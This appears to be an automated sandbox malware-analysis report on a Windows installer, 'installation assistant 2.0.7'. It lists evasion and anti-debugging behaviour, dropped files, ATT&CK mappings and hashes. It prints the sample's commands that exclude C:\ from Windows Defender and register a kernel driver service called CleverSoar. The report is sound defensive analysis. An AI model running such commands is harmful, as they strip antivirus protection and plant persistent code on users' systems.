Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; System information queried: FirmwareTableInformation
Source: C:\Windows\System32\svchost.exe; File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 3367
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 6387
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Window / User API: threadDelayed 592
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Window / User API: threadDelayed 555
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Window / User API: threadDelayed 541
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-CH3DR.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\trash (copy)
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-LO727.tmp\_isetup\_setup64.tmp
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dll
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-LO727.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\updat4.vac
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\is-H48MF.tmp
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-CH3DR.tmp\_isetup\_setup64.tmp
Source: C:\Program Files (x86)\Windows NT\7zr.exe; API coverage: 7.5 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444; Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\svchost.exe; File opened: PhysicalDrive0
Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe; File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exe; File Volume queried: C:\Windows\System32 FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Code function: 12_2_6C9698B0 FindFirstFileA,FindClose,FindClose, 12_2_6C9698B0
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 17_2_009B6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW, 17_2_009B6868
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 17_2_009B7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW, 17_2_009B7496
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 17_2_009B9C60 GetSystemInfo, 17_2_009B9C60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
Source: svchost.exe, 00000005.00000002.1541736980.0000020AE9E3B000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000002.1371000620.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000005.00000002.1542005852.0000020AE9E7F000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000005.00000002.1541736980.0000020AE9E2B000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: (@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000005.00000002.1541736980.0000020AE9E2B000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: svchost.exe, 00000005.00000002.1542005852.0000020AE9E64000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 00000005.00000002.1541589817.0000020AE9E02000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: svchost.exe, 00000005.00000002.1542145500.0000020AE9F02000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000005.00000002.1541822263.0000020AE9E4B000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: \Device\HarddiskVolume1\??\Volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D: @
Source: svchost.exe, 00000005.00000002.1542005852.0000020AE9E7F000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: #Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000000A.00000002.1540505343.00000202A1E2B000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Code function: 12_2_6C7F3886 NtSetInformationThread 00000000,00000011,00000000,00000000 12_2_6C7F3886
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Code function: 12_2_6C97EFA1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_6C97EFA1
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 17_2_00A357D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount, 17_2_00A357D0
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Code function: 12_2_6C97DF9D mov eax, dword ptr fs:[00000030h] 12_2_6C97DF9D
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Code function: 12_2_6C988B86 mov eax, dword ptr fs:[00000030h] 12_2_6C988B86
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Code function: 12_2_6C988B55 mov eax, dword ptr fs:[00000030h] 12_2_6C988B55
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Code function: 12_2_6C977ADD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_6C977ADD

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: tProtect.dll.19.dr; Static PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe; Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Code function: 12_2_6CA45720 cpuid 12_2_6CA45720
Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe; Queries volume information: C: VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 17_2_009BAB2A GetSystemTimeAsFileTime, 17_2_009BAB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 17_2_00A50090 GetVersion, 17_2_00A50090

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\svchost.exe; Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Provider\Av\{D68DDC3A-831F-4fae-9E44-DA132C1ACF46} STATE
Source: svchost.exe, 00000007.00000002.1542269208.000001FEBB102000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Windows\System32\svchost.exe; WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
MITRE ATT&CK Matrix (one line per tactic; a number in front of a technique is the count badge shown on the page for that cell)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 1 Windows Management Instrumentation; 1 Native API; 2 Command and Scripting Interpreter; 1 Service Execution; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading; 11 Windows Service; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 DLL Side-Loading; 1 Access Token Manipulation; 11 Windows Service; 111 Process Injection; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: 2 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 11 Masquerading; 251 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 111 Process Injection
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 1 System Time Discovery; 3 File and Directory Discovery; 36 System Information Discovery; 361 Security Software Discovery; 251 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Application Window Discovery; 2 System Owner/User Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 1 Encrypted Channel; 1 Non-Application Layer Protocol; 1 Application Layer Protocol; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph (ID: 1579756, Sample: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, Startdate: 23/12/2024, Architecture: WINDOWS, Score: 92), rendered as a process tree:

Sample-level DNS/IP info: time.windows.com
Sample-level signatures: Multi AV Scanner detection for submitted file; Found driver which could be used to inject code into processes; PE file contains section with special chars; 2 other signatures

• #U5b89#U88c5#U52a9#U624b_2.0.7.exe (started)
  • dropped: C:\...\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp, PE32
  • #U5b89#U88c5#U52a9#U624b_2.0.7.tmp (started)
    • dropped: C:\Users\user\AppData\Local\...\update.vac, PE32
    • dropped: C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+
    • signature: Adds a directory exclusion to Windows Defender
    • #U5b89#U88c5#U52a9#U624b_2.0.7.exe (started)
      • dropped: C:\...\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp, PE32
      • #U5b89#U88c5#U52a9#U624b_2.0.7.tmp (started)
        • dropped: C:\Users\user\AppData\Local\...\update.vac, PE32
        • dropped: C:\Program Files (x86)\...\updat4.vac, PE32
        • dropped: C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+
        • dropped: 3 other files (none is malicious)
        • signature: Query firmware table information (likely to detect VMs)
        • signature: Protects its processes via BreakOnTermination flag
        • signature: Hides threads from debuggers
        • signature: Contains functionality to hide a thread from the debugger
        • 7zr.exe (started)
          • dropped: C:\Program Files (x86)\...\tProtect.dll, PE32+
          • conhost.exe (started)
        • 7zr.exe (started)
          • conhost.exe (started)
    • powershell.exe (started)
      • signature: Loading BitLocker PowerShell Module
      • conhost.exe (started)
      • WmiPrvSE.exe (started)
• svchost.exe (started)
  • signature: Changes security center settings (notifications, updates, antivirus, firewall)
• cmd.exe (started)
  • sc.exe (started)
    • conhost.exe (started)
• 30 other processes (started)
  • sc.exe (started) x3, each starting conhost.exe
  • 21 other processes (started)
    • conhost.exe (started) x2
    • 19 other processes (started)

Source  Detection  Scanner  Label  Link
#U5b89#U88c5#U52a9#U624b_2.0.7.exe  8%  ReversingLabs
#U5b89#U88c5#U52a9#U624b_2.0.7.exe  10%  Virustotal  Browse

Source  Detection  Scanner  Label  Link
C:\Program Files (x86)\Windows NT\7zr.exe  0%  ReversingLabs
C:\Program Files (x86)\Windows NT\is-H48MF.tmp  0%  ReversingLabs
C:\Program Files (x86)\Windows NT\tProtect.dll  9%  ReversingLabs
C:\Program Files (x86)\Windows NT\trash (copy)  0%  ReversingLabs
C:\Program Files (x86)\Windows NT\updat4.vac  13%  ReversingLabs
C:\Users\user\AppData\Local\Temp\is-CH3DR.tmp\_isetup\_setup64.tmp  0%  ReversingLabs
C:\Users\user\AppData\Local\Temp\is-CH3DR.tmp\update.vac  13%  ReversingLabs
C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp  0%  ReversingLabs
C:\Users\user\AppData\Local\Temp\is-LO727.tmp\_isetup\_setup64.tmp  0%  ReversingLabs
C:\Users\user\AppData\Local\Temp\is-LO727.tmp\update.vac  13%  ReversingLabs
C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp  0%  ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
Name  IP  Active  Malicious  Antivirus Detection  Reputation
time.windows.com  unknown  unknown  false  (none)  high
No contacted IP infos

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579756
Start date and time: 2024-12-23 08:37:24 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 22s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes: 96
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Critical Process Termination
Sample name: #U5b89#U88c5#U52a9#U624b_2.0.7.exe (renamed because the original name is a hash value)
Original Sample Name: _2.0.7.exe
Detection: MAL
Classification: mal92.evad.winEXE@125/32@1/0
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 74%
• Number of executed functions: 27
• Number of non-executed functions: 109
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 40.81.94.65, 13.107.246.63, 4.245.163.56
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, twc.trafficmanager.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time  Type  Description
02:38:28  API Interceptor  37x Sleep call for process: powershell.exe modified

No context
No context
No context
No context
Match  Associated Sample Name / URL  SHA 256  Detection  Threat Name  Link  Context
C:\Program Files (x86)\Windows NT\7zr.exe  #U5b89#U88c5#U52a9#U624b_2.0.5.exe  Get hash  malicious  Unknown  Browse
  #U5b89#U88c5#U52a9#U624b_2.0.4.exe  Get hash  malicious  Unknown  Browse
  #U5b89#U88c5#U52a9#U624b_2.0.5.exe  Get hash  malicious  Unknown  Browse
  #U5b89#U88c5#U52a9#U624b_2.0.4.exe  Get hash  malicious  Unknown  Browse
  Zt43pLXYiu.exe  Get hash  malicious  Unknown  Browse
  #U5b89#U88c5#U52a9#U624b_1.0.9.exe  Get hash  malicious  Unknown  Browse
  Zt43pLXYiu.exe  Get hash  malicious  Unknown  Browse
  #U5b89#U88c5#U52a9#U624b_1.0.1.exe  Get hash  malicious  Unknown  Browse
  #U5b89#U88c5#U52a9#U624b_1.0.8.exe  Get hash  malicious  Unknown  Browse
  #U5b89#U88c5#U52a9#U624b_1.0.9.exe  Get hash  malicious  Unknown  Browse
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):831200
                                                                                                              Entropy (8bit):6.671005303304742
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
                                                                                                              MD5:84DC4B92D860E8AEA55D12B1E87EA108
                                                                                                              SHA1:56074A031A81A2394770D4DA98AC01D99EC77AAD
                                                                                                              SHA-256:BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
                                                                                                              SHA-512:CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
                                                                                                              Malicious:false
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Joe Sandbox View:
                                                                                                              • Filename: #U5b89#U88c5#U52a9#U624b_2.0.5.exe, Detection: malicious
                                                                                                              • Filename: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, Detection: malicious
                                                                                                              • Filename: #U5b89#U88c5#U52a9#U624b_2.0.5.exe, Detection: malicious
                                                                                                              • Filename: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, Detection: malicious
                                                                                                              • Filename: Zt43pLXYiu.exe, Detection: malicious
                                                                                                              • Filename: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, Detection: malicious
                                                                                                              • Filename: Zt43pLXYiu.exe, Detection: malicious
                                                                                                              • Filename: #U5b89#U88c5#U52a9#U624b_1.0.1.exe, Detection: malicious
                                                                                                              • Filename: #U5b89#U88c5#U52a9#U624b_1.0.8.exe, Detection: malicious
                                                                                                              • Filename: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, Detection: malicious
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):249984
